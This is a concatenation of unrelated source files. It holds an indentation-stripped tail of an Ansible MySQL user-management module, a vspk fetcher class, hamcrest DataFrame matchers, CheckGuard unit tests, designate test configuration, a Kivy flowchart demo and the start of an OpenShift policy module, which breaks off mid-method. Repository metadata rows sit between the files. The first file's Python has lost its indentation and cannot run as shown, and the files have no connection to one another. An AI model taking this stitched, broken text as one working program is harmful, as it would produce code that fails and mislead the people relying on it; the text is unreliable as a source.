def pick(x):
if x == 'ALL PRIVILEGES':
return 'ALL'
else:
return x
for grant in grants:
res = re.match("GRANT (.+) ON (.+) TO '.*'@'.+'( IDENTIFIED BY PASSWORD '.+')? ?(.*)", grant[0])
if res is None:
raise InvalidPrivsError('unable to parse the MySQL grant string: %s' % grant[0])
privileges = res.group(1).split(", ")
privileges = [ pick(x) for x in privileges]
if "WITH GRANT OPTION" in res.group(4):
privileges.append('GRANT')
if "REQUIRE SSL" in res.group(4):
privileges.append('REQUIRESSL')
db = res.group(2)
output[db] = privileges
return output
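def _privileges_get_regex_example():
    # Hedged illustration (editor's sketch, not part of the original module):
    # for a SHOW GRANTS row such as the one below, the regex in
    # privileges_get() yields {'`mydb`.*': ['SELECT', 'INSERT']}.
    grant = "GRANT SELECT, INSERT ON `mydb`.* TO 'bob'@'localhost' "
    res = re.match("GRANT (.+) ON (.+) TO '.*'@'.+'( IDENTIFIED BY PASSWORD '.+')? ?(.*)", grant)
    return {res.group(2): res.group(1).split(", ")}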
def privileges_unpack(priv, mode):
""" Take a privileges string, typically passed as a parameter, and unserialize
it into a dictionary, the same format as privileges_get() above. We have this
custom format to avoid using YAML/JSON strings inside YAML playbooks. Example
of a privileges string:
mydb.*:INSERT,UPDATE/anotherdb.*:SELECT/yetanother.*:ALL
The privilege USAGE stands for no privileges, so we add that in on *.* if it's
not specified in the string, as MySQL will always provide this by default.
"""
if mode == 'ANSI':
quote = '"'
else:
quote = '`'
output = {}
privs = []
for item in priv.strip().split('/'):
pieces = item.strip().split(':')
dbpriv = pieces[0].rsplit(".", 1)
# Do not escape if privilege is for database '*' (all databases)
if dbpriv[0].strip('`') != '*':
pieces[0] = '%s%s%s.%s' % (quote, dbpriv[0].strip('`'), quote, dbpriv[1])
if '(' in pieces[1]:
output[pieces[0]] = re.split(r',\s*(?=[^)]*(?:\(|$))', pieces[1].upper())
for i in output[pieces[0]]:
privs.append(re.sub(r'\(.*\)','',i))
else:
output[pieces[0]] = pieces[1].upper().split(',')
privs = output[pieces[0]]
new_privs = frozenset(privs)
if not new_privs.issubset(VALID_PRIVS):
raise InvalidPrivsError('Invalid privileges specified: %s' % new_privs.difference(VALID_PRIVS))
if '*.*' not in output:
output['*.*'] = ['USAGE']
# if we are only specifying something like REQUIRESSL and/or GRANT (=WITH GRANT OPTION) in *.*
# we still need to add USAGE as a privilege to avoid syntax errors
if 'REQUIRESSL' in priv and not set(output['*.*']).difference(set(['GRANT', 'REQUIRESSL'])):
output['*.*'].append('USAGE')
return output
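def _privileges_unpack_example():
    # Hedged illustration (editor's sketch, not part of the original module):
    # unpacking the documented string format in non-ANSI mode yields
    # {'`mydb`.*': ['INSERT', 'UPDATE'], '`anotherdb`.*': ['SELECT'],
    #  '*.*': ['USAGE']}.
    return privileges_unpack('mydb.*:INSERT,UPDATE/anotherdb.*:SELECT',
                             'NOTANSI')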
def privileges_revoke(cursor, user,host,db_table,priv,grant_option):
# Escape '%' since mysql db.execute() uses a format string
db_table = db_table.replace('%', '%%')
if grant_option:
query = ["REVOKE GRANT OPTION ON %s" % db_table]
query.append("FROM %s@%s")
query = ' '.join(query)
cursor.execute(query, (user, host))
priv_string = ",".join([p for p in priv if p not in ('GRANT', 'REQUIRESSL')])
query = ["REVOKE %s ON %s" % (priv_string, db_table)]
query.append("FROM %s@%s")
query = ' '.join(query)
cursor.execute(query, (user, host))
def privileges_grant(cursor, user,host,db_table,priv):
# Escape '%' since mysql db.execute uses a format string and the
# specification of db and table often use a % (SQL wildcard)
db_table = db_table.replace('%', '%%')
priv_string = ",".join([p for p in priv if p not in ('GRANT', 'REQUIRESSL')])
query = ["GRANT %s ON %s" % (priv_string, db_table)]
query.append("TO %s@%s")
if 'REQUIRESSL' in priv:
query.append("REQUIRE SSL")
if 'GRANT' in priv:
query.append("WITH GRANT OPTION")
query = ' '.join(query)
cursor.execute(query, (user, host))
# ===========================================
# Module execution.
#
def main():
module = AnsibleModule(
argument_spec = dict(
login_user=dict(default=None),
login_password=dict(default=None),
login_host=dict(default="localhost"),
login_port=dict(default=3306, type='int'),
login_unix_socket=dict(default=None),
user=dict(required=True, aliases=['name']),
password=dict(default=None, no_log=True, type='str'),
encrypted=dict(default=False, type='bool'),
host=dict(default="localhost"),
host_all=dict(type="bool", default="no"),
state=dict(default="present", choices=["absent", "present"]),
priv=dict(default=None),
append_privs=dict(default=False, type='bool'),
check_implicit_admin=dict(default=False, type='bool'),
update_password=dict(default="always", choices=["always", "on_create"]),
config_file=dict(default="~/.my.cnf"),
ssl_cert=dict(default=None),
ssl_key=dict(default=None),
ssl_ca=dict(default=None),
),
supports_check_mode=True
)
login_user = module.params["login_user"]
login_password = module.params["login_password"]
user = module.params["user"]
password = module.params["password"]
encrypted = module.boolean(module.params["encrypted"])
host = module.params["host"].lower()
host_all = module.params["host_all"]
state = module.params["state"]
priv = module.params["priv"]
check_implicit_admin = module.params['check_implicit_admin']
config_file = module.params['config_file']
append_privs = module.boolean(module.params["append_privs"])
update_password = module.params['update_password']
ssl_cert = module.params["ssl_cert"]
ssl_key = module.params["ssl_key"]
ssl_ca = module.params["ssl_ca"]
db = 'mysql'
config_file = os.path.expanduser(os.path.expandvars(config_file))
if not mysqldb_found:
module.fail_json(msg="the python mysqldb module is required")
cursor = None
try:
if check_implicit_admin:
try:
cursor = mysql_connect(module, 'root', '', config_file, ssl_cert, ssl_key, ssl_ca, db)
except:
pass
if not cursor:
cursor = mysql_connect(module, login_user, login_password, config_file, ssl_cert, ssl_key, ssl_ca, db)
except Exception, e:
module.fail_json(msg="unable to connect to database, check login_user and login_password are correct or %s has the credentials. Exception message: %s" % (config_file, e))
if priv is not None:
try:
mode = get_mode(cursor)
except Exception, e:
module.fail_json(msg=str(e))
try:
priv = privileges_unpack(priv, mode)
except Exception, e:
module.fail_json(msg="invalid privileges string: %s" % str(e))
if state == "present":
if user_exists(cursor, user, host, host_all):
try:
if update_password == 'always':
changed = user_mod(cursor, user, host, host_all, password, encrypted, priv, append_privs, module.check_mode)
else:
changed = user_mod(cursor, user, host, host_all, None, encrypted, priv, append_privs, module.check_mode)
except (SQLParseError, InvalidPrivsError, MySQLdb.Error), e:
module.fail_json(msg=str(e))
else:
if password is None:
module.fail_json(msg="password parameter required when adding a user")
if host_all:
module.fail_json(msg="host_all parameter cannot be used when adding a user")
try:
changed = user_add(cursor, user, host, host_all, password, encrypted, priv, module.check_mode)
except (SQLParseError, InvalidPrivsError, MySQLdb.Error), e:
module.fail_json(msg=str(e))
elif state == "absent":
if user_exists(cursor, user, host, host_all):
changed = user_delete(cursor, user, host, host_all, module.check_mode)
else:
changed = False
module.exit_json(changed=changed, user=user)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.database import *
from ansible.module_utils.mysql import *
if __name__ == '__main__':
main()
| gpl-3.0 | 8,417,220,587,364,133,000 | 38.315603 | 178 | 0.611437 | false |
nuagenetworks/vspk-python | vspk/v5_0/fetchers/nuinfrastructureevdfprofiles_fetcher.py | 2 | 2226 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc, 2017 Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from bambou import NURESTFetcher
class NUInfrastructureEVDFProfilesFetcher(NURESTFetcher):
""" Represents a NUInfrastructureEVDFProfiles fetcher
Notes:
This fetcher enables to fetch NUInfrastructureEVDFProfile objects.
See:
bambou.NURESTFetcher
"""
@classmethod
def managed_class(cls):
""" Return NUInfrastructureEVDFProfile class that is managed.
Returns:
.NUInfrastructureEVDFProfile: the managed class
"""
from .. import NUInfrastructureEVDFProfile
return NUInfrastructureEVDFProfile
| bsd-3-clause | 1,874,936,843,171,087,600 | 41.018868 | 86 | 0.739443 | false |
Pyangs/ShiPanE-Python-SDK | tests/shipane_sdk/matchers/dataframe_matchers.py | 1 | 1232 | # -*- coding: utf-8 -*-
import re
from hamcrest.core.base_matcher import BaseMatcher
class HasColumn(BaseMatcher):
def __init__(self, column):
self._column = column
def _matches(self, df):
return self._column in df.columns
def describe_to(self, description):
description.append_text(u'Dataframe doesn\'t have colum [{0}]'.format(self._column))
def has_column(column):
return HasColumn(column)
class HasColumnMatches(BaseMatcher):
def __init__(self, column_pattern):
self._column_pattern = re.compile(column_pattern)
def _matches(self, df):
return df.filter(regex=self._column_pattern).columns.size > 0
def describe_to(self, description):
description.append_text(u'Dataframe doesn\'t have colum matches [{0}]'.format(self._column_pattern))
def has_column_matches(column_pattern):
return HasColumnMatches(column_pattern)
class HasRow(BaseMatcher):
def __init__(self, row):
self._row = row
def _matches(self, df):
return self._row in df.index
def describe_to(self, description):
description.append_text(u'Dataframe doesn\'t have row [%s]'.format(self._row))
def has_row(row):
return HasRow(row)
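def _matchers_example():
    # Hedged illustration (editor's sketch, not part of the original module):
    # the matchers above plug into hamcrest's assert_that as usual.
    import pandas as pd
    from hamcrest import assert_that
    df = pd.DataFrame({'price': [1.0]}, index=['000001'])
    assert_that(df, has_column('price'))
    assert_that(df, has_column_matches(r'^pri'))
    assert_that(df, has_row('000001'))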
| mit | 5,263,478,676,103,618,000 | 23.64 | 108 | 0.666396 | false |
ner0x652/CheckGuard | tests/CheckTests.py | 2 | 5706 |
import CheckParser
import re
import unittest
import itertools
class ParserIniPosTest(unittest.TestCase):
def setUp(self):
self.testObj = CheckParser.CheckParser(0)
print("ParserIniPos SetUp executed")
def tearDown(self):
self.testObj = None
print("ParserIniPos TearDown executed")
def test_ini_pos(self):
self.assertEqual(self.testObj.position, 0, "Initial position is not 0")
def test_changed_pos(self):
self.testObj.position = 1
self.assertEqual(self.testObj.position, 1, "Initial position didn't change")
def test_negative_pos(self):
self.assertRaises(ValueError, CheckParser.CheckParser, -1)
class FileWriteReadTest(unittest.TestCase):
def setUp(self):
self.filename = r"C:\Users\nero_luci\Desktop\GitHub\CheckGuard\tests\pos.txt"
print("FileWriteRead SetUp executed")
def tearDown(self):
print("FileWriteRead TearDown executed")
def test_write_2_file(self):
value_2_file = "0"
CheckParser.write_init_pos(value_2_file)
with open(self.filename, "r") as tf:
expected = tf.read()
self.assertEqual(expected, value_2_file, "File writing failed")
def test_read_from_file(self):
expected = 0
read_value = CheckParser.read_init_pos()
self.assertEqual(expected, read_value, "File reading failed")
class RegexTest(unittest.TestCase):
def setUp(self):
self.test_list_1 = ["2 x #2 mere pere @ 0,01 0% 0,01",
"1 x #33 hubba bubba @ 12,50 9% 0,01",
"7 x #103 Cappuccino @ 7,00 24% 7,00",
"5 x #2400 Dorna Apa @ 555,70 24% 5,70",
"3 x #307 Frappe @ 7,50 9% 7,50",
"25 x #101 Cafea @ 5,50 24% 11,00",
"2 x #2101 Bere @ 6,70 24% 13,40",
"66 x #2327 Lemonade @ 6,00 0% 6,00",
"8 x #2310 Fresh @ 8,80 16% 8,80",
"999 x #2332 Whisky&Cola @ 9,90 11% 19,80"
]
self.test_line_3 = "cnaldknpinda % @ xx \/'*&"
self.prices = ['0,01', '12,50', '7,00', '555,70', '7,50', '5,50', '6,70', '6,00', '8,80', '9,90']
self.qtys = ['2', '1', '7', '5', '3', '25', '2', '66', '8', '999']
self.tvas = ['0%', '9%', '24%', '24%', '9%', '24%', '24%', '0%', '16%', '11%']
self.names = ['mere pere', 'hubba bubba', 'Cappuccino', 'Dorna Apa', 'Frappe', 'Cafea', 'Bere',
'Lemonade', 'Fresh', 'Whisky&Cola']
def tearDown(self):
pass
def test_price_regex_1(self):
for line, price in itertools.izip(self.test_list_1, self.prices):
reg_ex = re.search('\d+\,\d+', line)
# self.assertIsNotNone(reg_ex, "Regex price is not valid: test 1")
self.assertEqual(line[reg_ex.start():reg_ex.end()], price, "Price not equal")
def test_qty_regex_1(self):
for line, qty in itertools.izip(self.test_list_1, self.qtys):
reg_ex = re.search('\d+', line)
#self.assertIsNotNone(reg_ex, "Regex quantity is not valid: test 1")
self.assertEqual(line[reg_ex.start():reg_ex.end()], qty, "Quantity not equal")
def test_qty_regex_2(self):
reg_ex = re.search('\d+', self.test_line_3)
self.assertIsNone(reg_ex, "Regex quantity is not valid: test 3")
def test_tva_regex_1(self):
for line, tva in itertools.izip(self.test_list_1, self.tvas):
reg_ex = re.search('\d{1,2}%', line)
# self.assertIsNotNone(reg_ex, "Regex tva is not valid: test 1")
self.assertEqual(line[reg_ex.start():reg_ex.end()], tva, "Tva not equal")
def test_name_regex_1(self):
for line, name in itertools.izip(self.test_list_1, self.names):
reg_ex = re.search('[a-zA-Z]{2,}[\S\s]?[a-zA-Z]*[\S\s]?[a-zA-Z]*', line)
# self.assertIsNotNone(reg_ex, "Regex name is not valid: test 1")
self.assertEqual(line[reg_ex.start():reg_ex.end()].strip(' '), name, "Name not equal")
class ParserReadCheckFile(unittest.TestCase):
"""
For this test you should comment 2 lines in CheckParser.py read_file():
self.generate_new_check()
self.check_data = []
"""
def setUp(self):
self.testObj = CheckParser.CheckParser(0, r"C:\Users\nero_luci\Desktop\GitHub\CheckGuard\tests\files.txt")
self.testObj2 = CheckParser.CheckParser(0, r"C:\Users\nero_luci\Desktop\GitHub\CheckGuard\tests\files2.txt")
self.expected_check_1 = ["1 x #2 bacsis @ 0,01 0% 0,01 \r\n",
"1 x #1 extra @ 0,10 24% 0,10 \r\n"]
self.expected_check_2 = []
def test_data_1(self):
self.testObj.read_file()
self.assertListEqual(self.testObj.check_data, self.expected_check_1, "Lists are not equal: test 1")
def test_data_2(self):
self.testObj2.read_file()
self.assertListEqual(self.testObj2.check_data, self.expected_check_2, "Lists are not equal: test 2")
testList = [ParserIniPosTest, FileWriteReadTest, RegexTest, ParserReadCheckFile]
testLoad = unittest.TestLoader()
caseList = []
for testCase in testList:
testSuite = testLoad.loadTestsFromTestCase(testCase)
caseList.append(testSuite)
checkGuardTestSuite = unittest.TestSuite(caseList)
runner = unittest.TextTestRunner()
runner.run(checkGuardTestSuite) | gpl-2.0 | 7,732,005,686,704,460,000 | 41.909774 | 116 | 0.560813 | false |
ramsateesh/designate | functionaltests/common/config.py | 1 | 2392 | """
Copyright 2015 Rackspace
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
from oslo_config import cfg
cfg.CONF.register_group(cfg.OptGroup(
name='identity', title="Configuration for Keystone auth"
))
cfg.CONF.register_group(cfg.OptGroup(
name='noauth', title="Configuration to run tests without Keystone"
))
cfg.CONF.register_opts([
cfg.StrOpt('designate_override_url',
help="Use this instead of the endpoint in the service catalog"),
cfg.BoolOpt('append_version_to_url', default=True,
help="Post to url + /v2/zones instead of url + /zones"),
cfg.StrOpt('uri', help="The Keystone v2 endpoint"),
cfg.StrOpt('uri_v3', help="The Keystone v3 endpoint"),
cfg.StrOpt('auth_version', default='v2'),
cfg.StrOpt('region', default=None),
cfg.StrOpt('username'),
cfg.StrOpt('tenant_name'),
cfg.StrOpt('password', secret=True),
cfg.StrOpt('domain_name'),
cfg.StrOpt('alt_username'),
cfg.StrOpt('alt_tenant_name'),
cfg.StrOpt('alt_password', secret=True),
cfg.StrOpt('alt_domain_name'),
cfg.StrOpt('admin_username'),
cfg.StrOpt('admin_tenant_name'),
cfg.StrOpt('admin_password', secret=True),
cfg.StrOpt('admin_domain_name'),
], group='identity')
cfg.CONF.register_opts([
cfg.StrOpt('designate_endpoint', help="The Designate API endpoint"),
cfg.StrOpt('tenant_id', default='noauth-project'),
cfg.StrOpt('alt_tenant_id', default='alt-project'),
cfg.StrOpt('admin_tenant_id', default='admin-project'),
cfg.BoolOpt('use_noauth', default=False),
], group='noauth')
cfg.CONF.register_opts([
cfg.ListOpt('nameservers', default=["127.0.0.1:53"])
], group="designate")
def find_config_file():
return os.environ.get(
'TEMPEST_CONFIG', '/opt/stack/tempest/etc/tempest.conf')
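def _find_config_file_example():
    # Hedged illustration (editor's sketch, not part of the original module):
    # the TEMPEST_CONFIG environment variable overrides the default path.
    os.environ['TEMPEST_CONFIG'] = '/tmp/tempest.conf'
    assert find_config_file() == '/tmp/tempest.conf'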
def read_config():
cfg.CONF(args=[], default_config_files=[find_config_file()])
| apache-2.0 | -4,448,889,142,459,497,500 | 30.473684 | 79 | 0.692308 | false |
AO-StreetArt/FinalFlowChartExample | FlowChartExampleApp.py | 1 | 3129 | # -*- coding: utf-8 -*-
"""
Created on Tue Oct 20 19:03:15 2015
@author: alex
"""
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.properties import ObjectProperty, ListProperty, NumericProperty, BooleanProperty
from kivy.uix.label import Label
from kivy.uix.gridlayout import GridLayout
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.floatlayout import FloatLayout
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.logger import Logger
from src.DragGrid import DragGrid, DragGridCell
from src.FlowChartNode2 import FlowChartNode, DraggableImage
from src.DraggableOption import DraggableOption
Builder.load_file('flowchartwidget.kv')
class FlowchartExampleWidget(FloatLayout):
drag_grid=ObjectProperty(None)
grid_layout=ObjectProperty(None)
float_layout=ObjectProperty(None)
class FlowchartExampleApp(App):
def build(self):
root = FlowchartExampleWidget()
#Add a flowchart node
lbl = Label(text='Test')
drag_label = DraggableImage(img=lbl, app=self, grid=root.drag_grid, cell=root.drag_grid.cells[0])
drag = FlowChartNode(app=self, grid=root.drag_grid, cell=root.drag_grid.cells[0], label=drag_label)
drag_label.node = drag
root.drag_grid.cells[0].add_widget(drag)
root.drag_grid.cells[0].nodes.append(drag)
root.drag_grid.nodes.append(drag)
#Add a flowchart node
lbl2 = Label(text='Test2')
drag_label2 = DraggableImage(img=lbl2, app=self, grid=root.drag_grid, cell=root.drag_grid.cells[1])
drag2 = FlowChartNode(app=self, grid=root.drag_grid, cell=root.drag_grid.cells[1], label=drag_label2)
drag_label2.node = drag2
root.drag_grid.cells[1].add_widget(drag2)
root.drag_grid.cells[1].nodes.append(drag2)
root.drag_grid.nodes.append(drag2)
#Add a draggable list option that can be dragged into the flowchart.
lbl3 = Label(text='Test')
drag_option = DraggableOption(img=lbl3, app=self, grid=root.drag_grid, grid_layout=root.grid_layout, float_layout=root.float_layout)
root.grid_layout.add_widget(drag_option)
#Add a draggable list option that can be dragged into the flowchart.
lbl4 = Label(text='Test')
drag_option2 = DraggableOption(img=lbl4, app=self, grid=root.drag_grid, grid_layout=root.grid_layout, float_layout=root.float_layout)
root.grid_layout.add_widget(drag_option2)
return root
def add_flowchart_node(self, cell, image):
Logger.debug('Add flowchart node with image %s and cell %s' % (image, cell))
drag_label = DraggableImage(img=image, app=self, grid=self.root.drag_grid, cell=self.root.drag_grid.cells[0])
drag = FlowChartNode(app=self, grid=self.root.drag_grid, cell=self.root.drag_grid.cells[0], label=drag_label)
drag_label.node = drag
cell.add_widget(drag)
cell.nodes.append(drag)
self.root.drag_grid.nodes.append(drag)
if __name__ == '__main__':
FlowchartExampleApp().run() | mit | 2,255,996,567,566,147,300 | 40.733333 | 141 | 0.691595 | false |
joelddiaz/openshift-tools | openshift/installer/vendored/openshift-ansible-3.4.40/roles/lib_openshift/library/oc_adm_policy_group.py | 12 | 68660 | #!/usr/bin/env python
# pylint: disable=missing-docstring
# flake8: noqa: T001
# ___ ___ _ _ ___ ___ _ _____ ___ ___
# / __| __| \| | __| _ \ /_\_ _| __| \
# | (_ | _|| .` | _|| / / _ \| | | _|| |) |
# \___|___|_|\_|___|_|_\/_/_\_\_|_|___|___/_ _____
# | \ / _ \ | \| |/ _ \_ _| | __| \_ _|_ _|
# | |) | (_) | | .` | (_) || | | _|| |) | | | |
# |___/ \___/ |_|\_|\___/ |_| |___|___/___| |_|
#
# Copyright 2016 Red Hat, Inc. and/or its affiliates
# and other contributors as indicated by the @author tags.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- -*- -*- Begin included fragment: lib/import.py -*- -*- -*-
'''
OpenShiftCLI class that wraps the oc commands in a subprocess
'''
# pylint: disable=too-many-lines
from __future__ import print_function
import atexit
import copy
import json
import os
import re
import shutil
import subprocess
import tempfile
# pylint: disable=import-error
try:
import ruamel.yaml as yaml
except ImportError:
import yaml
from ansible.module_utils.basic import AnsibleModule
# -*- -*- -*- End included fragment: lib/import.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: doc/policy_group -*- -*- -*-
DOCUMENTATION = '''
---
module: oc_adm_policy_group
short_description: Module to manage openshift policy for groups
description:
- Manage openshift policy for groups.
options:
kubeconfig:
description:
- The path for the kubeconfig file to use for authentication
required: false
default: /etc/origin/master/admin.kubeconfig
aliases: []
namespace:
description:
- The namespace scope
required: false
default: None
aliases: []
debug:
description:
- Turn on debug output.
required: false
default: False
aliases: []
group:
description:
- The name of the group
required: true
default: None
aliases: []
resource_kind:
description:
- The kind of policy to affect
required: true
default: None
choices: ["role", "cluster-role", "scc"]
aliases: []
resource_name:
description:
- The name of the policy
required: true
default: None
aliases: []
state:
description:
- Desired state of the policy
required: true
default: present
choices: ["present", "absent"]
aliases: []
author:
- "Kenny Woodson <[email protected]>"
extends_documentation_fragment: []
'''
EXAMPLES = '''
- name: oc adm policy remove-scc-from-group an-scc agroup
oc_adm_policy_group:
group: agroup
resource_kind: scc
resource_name: an-scc
state: absent
- name: oc adm policy add-cluster-role-to-group system:build-strategy-docker agroup
oc_adm_policy_group:
group: agroup
resource_kind: cluster-role
resource_name: system:build-strategy-docker
state: present
'''
# -*- -*- -*- End included fragment: doc/policy_group -*- -*- -*-
# -*- -*- -*- Begin included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-
# pylint: disable=undefined-variable,missing-docstring
# noqa: E301,E302
class YeditException(Exception):
''' Exception class for Yedit '''
pass
# pylint: disable=too-many-public-methods
class Yedit(object):
''' Class to modify yaml files '''
re_valid_key = r"(((\[-?\d+\])|([0-9a-zA-Z%s/_-]+)).?)+$"
re_key = r"(?:\[(-?\d+)\])|([0-9a-zA-Z%s/_-]+)"
com_sep = set(['.', '#', '|', ':'])
# pylint: disable=too-many-arguments
def __init__(self,
filename=None,
content=None,
content_type='yaml',
separator='.',
backup=False):
self.content = content
self._separator = separator
self.filename = filename
self.__yaml_dict = content
self.content_type = content_type
self.backup = backup
self.load(content_type=self.content_type)
if self.__yaml_dict is None:
self.__yaml_dict = {}
@property
def separator(self):
''' getter method for yaml_dict '''
return self._separator
@separator.setter
def separator(self):
''' getter method for yaml_dict '''
return self._separator
@property
def yaml_dict(self):
''' getter method for yaml_dict '''
return self.__yaml_dict
@yaml_dict.setter
def yaml_dict(self, value):
''' setter method for yaml_dict '''
self.__yaml_dict = value
@staticmethod
def parse_key(key, sep='.'):
'''parse the key allowing the appropriate separator'''
common_separators = list(Yedit.com_sep - set([sep]))
return re.findall(Yedit.re_key % ''.join(common_separators), key)
@staticmethod
def valid_key(key, sep='.'):
'''validate the incoming key'''
common_separators = list(Yedit.com_sep - set([sep]))
if not re.match(Yedit.re_valid_key % ''.join(common_separators), key):
return False
return True
@staticmethod
def remove_entry(data, key, sep='.'):
''' remove data at location key '''
if key == '' and isinstance(data, dict):
data.clear()
return True
elif key == '' and isinstance(data, list):
del data[:]
return True
if not (key and Yedit.valid_key(key, sep)) and \
isinstance(data, (list, dict)):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes[:-1]:
if dict_key and isinstance(data, dict):
data = data.get(dict_key, None)
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
return None
# process last index for remove
# expected list entry
if key_indexes[-1][0]:
if isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1: # noqa: E501
del data[int(key_indexes[-1][0])]
return True
# expected dict entry
elif key_indexes[-1][1]:
if isinstance(data, dict):
del data[key_indexes[-1][1]]
return True
@staticmethod
def add_entry(data, key, item=None, sep='.'):
        ''' Add an item to a dictionary with key notation a.b.c
            d = {'a': {'b': 'c'}}
key = a#b
return c
'''
if key == '':
pass
elif (not (key and Yedit.valid_key(key, sep)) and
isinstance(data, (list, dict))):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes[:-1]:
if dict_key:
if isinstance(data, dict) and dict_key in data and data[dict_key]: # noqa: E501
data = data[dict_key]
continue
elif data and not isinstance(data, dict):
raise YeditException("Unexpected item type found while going through key " +
"path: {} (at key: {})".format(key, dict_key))
data[dict_key] = {}
data = data[dict_key]
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
raise YeditException("Unexpected item type found while going through key path: {}".format(key))
if key == '':
data = item
# process last index for add
# expected list entry
elif key_indexes[-1][0] and isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1: # noqa: E501
data[int(key_indexes[-1][0])] = item
# expected dict entry
elif key_indexes[-1][1] and isinstance(data, dict):
data[key_indexes[-1][1]] = item
# didn't add/update to an existing list, nor add/update key to a dict
# so we must have been provided some syntax like a.b.c[<int>] = "data" for a
# non-existent array
else:
raise YeditException("Error adding to object at path: {}".format(key))
return data
@staticmethod
def get_entry(data, key, sep='.'):
''' Get an item from a dictionary with key notation a.b.c
            d = {'a': {'b': 'c'}}
key = a.b
return c
'''
if key == '':
pass
elif (not (key and Yedit.valid_key(key, sep)) and
isinstance(data, (list, dict))):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes:
if dict_key and isinstance(data, dict):
data = data.get(dict_key, None)
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
return None
return data
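    @staticmethod
    def _get_entry_example():
        # Hedged illustration (editor's sketch, not part of the original
        # class): dotted keys walk nested dicts and [n] indexes walk lists.
        data = {'a': {'b': ['x', 'y']}}
        assert Yedit.get_entry(data, 'a.b[1]') == 'y'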
@staticmethod
def _write(filename, contents):
''' Actually write the file contents to disk. This helps with mocking. '''
tmp_filename = filename + '.yedit'
with open(tmp_filename, 'w') as yfd:
yfd.write(contents)
os.rename(tmp_filename, filename)
def write(self):
''' write to file '''
if not self.filename:
raise YeditException('Please specify a filename.')
if self.backup and self.file_exists():
shutil.copy(self.filename, self.filename + '.orig')
# Try to set format attributes if supported
try:
self.yaml_dict.fa.set_block_style()
except AttributeError:
pass
# Try to use RoundTripDumper if supported.
try:
Yedit._write(self.filename, yaml.dump(self.yaml_dict, Dumper=yaml.RoundTripDumper))
except AttributeError:
Yedit._write(self.filename, yaml.safe_dump(self.yaml_dict, default_flow_style=False))
return (True, self.yaml_dict)
def read(self):
''' read from file '''
# check if it exists
if self.filename is None or not self.file_exists():
return None
contents = None
with open(self.filename) as yfd:
contents = yfd.read()
return contents
def file_exists(self):
''' return whether file exists '''
if os.path.exists(self.filename):
return True
return False
def load(self, content_type='yaml'):
''' return yaml file '''
contents = self.read()
if not contents and not self.content:
return None
if self.content:
if isinstance(self.content, dict):
self.yaml_dict = self.content
return self.yaml_dict
elif isinstance(self.content, str):
contents = self.content
# check if it is yaml
try:
if content_type == 'yaml' and contents:
# Try to set format attributes if supported
try:
self.yaml_dict.fa.set_block_style()
except AttributeError:
pass
# Try to use RoundTripLoader if supported.
try:
self.yaml_dict = yaml.safe_load(contents, yaml.RoundTripLoader)
except AttributeError:
self.yaml_dict = yaml.safe_load(contents)
# Try to set format attributes if supported
try:
self.yaml_dict.fa.set_block_style()
except AttributeError:
pass
elif content_type == 'json' and contents:
self.yaml_dict = json.loads(contents)
except yaml.YAMLError as err:
# Error loading yaml or json
raise YeditException('Problem with loading yaml file. %s' % err)
return self.yaml_dict
def get(self, key):
''' get a specified key'''
try:
entry = Yedit.get_entry(self.yaml_dict, key, self.separator)
except KeyError:
entry = None
return entry
def pop(self, path, key_or_item):
''' remove a key, value pair from a dict or an item for a list'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
